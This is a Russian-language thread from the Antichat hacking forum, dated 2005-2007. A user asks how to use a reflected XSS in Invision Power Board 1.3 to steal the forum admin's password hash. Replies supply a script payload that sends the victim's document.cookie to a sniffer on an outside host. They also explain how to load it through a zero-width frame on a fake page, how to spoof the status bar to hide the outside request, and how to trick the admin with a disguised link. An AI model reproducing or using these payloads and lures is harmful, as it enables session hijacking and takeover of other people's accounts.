ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос про использование xss в Invision Power Board 1.3(U) Final
  #1  
Старый 27.07.2005, 03:40
Аватар для badboy
badboy
Banned
Регистрация: 14.03.2005
Сообщений: 21
Провел на форуме:
99047

Репутация: -2
Talking Вопрос про использование xss в Invision Power Board 1.3(U) Final

Кароче есть сайт http://victim.com/
На нём расположен форум Invision Power Board 1.3(U) Final
Нашёл XSS:http://victim.com/?c='><script>alert(document.cookie)</script><plaintext>

Пожалуйста объясните как я могу заполучить хэш админа.
Если надо вставить код со снифером,то пожалуйста напишите какойи куда вставлять...
 
Ответить с цитированием

  #2  
Старый 28.07.2005, 23:25
Аватар для WizART
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию

Что-то сайт какой-то странный, рисуночек такой "Go Away!"
 
Ответить с цитированием

  #3  
Старый 29.07.2005, 01:12
Аватар для censored!
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию

WizART - так просто, типа, обозначают сайт жертву. Victim - жертва. Типа тоже самое: www.жертва.com
...
Это пассивная XSS. Поэтому надо лепить липовую (фэйковую) страницу построенную на фреймах (или окно будет новое открываться) и там уже будет ссылка на эту XSS.
__________________
+ (это не крестик, это плюсик!)
__________________


 
Ответить с цитированием

  #4  
Старый 29.07.2005, 13:19
Аватар для censored!
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию

Фэйковый - липовый
Делай сайт на фреймах - левый нулевой, правый 100% (или просто iframe используй с шириной/высотой 0) тот который 100% будет типа липы. Можешь туда забабахать какое-нить изображение. В фрамесете путь до левого будет примерно такой:
Цитата:
http://victim.com/?c='><script>img = new Image(); img.src = 'http://путь_до_снифера.ru/snifer.php?'+document.cookie;</script>
+ в самом фрамесете подстра***ся и влепи код (но работать будет тока в ИЕ)
Цитата:
<script>
{
window.status="Готово!";
}
</script>
Чтобы большинство не видело что идет загрузка с другого сайта.
...
Можешь еще открыть новое Попап окно без статуса, прокрутки и т.п. и там какую-нить липовую рекламу поместить, но у некоторых может стоять резалка (или файервол) на открытие новых окон и обрубиться.
__________________
+ (это не крестик, это плюсик!)
__________________


 
Ответить с цитированием

  #5  
Старый 30.07.2005, 07:45
Аватар для Grrl
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию

в IPB 1.3 проще хэш сплойтом утянуть чем с xss париться.
 
Ответить с цитированием

  #6  
Старый 02.01.2007, 21:00
Аватар для Papercut
Papercut
Познающий
Регистрация: 23.10.2006
Сообщений: 45
Провел на форуме:
111215

Репутация: 9
По умолчанию

Grrl, ну не скажи... с некоторых 1.3 Final и"Русского модифицированного"
мне сплоиты не вытягивали хэши
 
Ответить с цитированием

  #7  
Старый 02.01.2007, 21:04
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

Цитата:
Сообщение от Papercut  
Grrl, ну не скажи... с некоторых 1.3 Final и"Русского модифицированного"
мне сплоиты не вытягивали хэши
Дак тебе не кто и негарантировал что сплойты на всех форумах работать будут...
 
Ответить с цитированием

  #8  
Старый 02.01.2007, 21:14
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Вы от куда попадали ? тутанхамоны наши =)
 
Ответить с цитированием

  #9  
Старый 02.01.2007, 21:46
Аватар для Diablo
Diablo
Участник форума
Регистрация: 07.11.2005
Сообщений: 166
Провел на форуме:
565212

Репутация: 111
По умолчанию

хы, сказать так: Смотри какую я тему намутил и ссылку (http://victim.com/?c='><script>img = new Image(); img.src = 'http://путь_до_снифера.ru/snifer.php?'+document.cookie;</script>). название ссылки - путь до реальной темы на форуме (для реальности), а адрес ссылки - xss . Не пинайте сильно . Если админ лох - прокатит
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Обход регистрации в Invision Power Board v1.3 Final DeeIP Форумы 1 10.04.2005 20:35
Вопрос про заливку шелла в Invision Power Board DiNo Форумы 14 03.03.2005 13:40
Вопрос про уязвимости в Invision Power Board(U) v1.3 Final Майор Форумы 15 14.01.2005 14:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ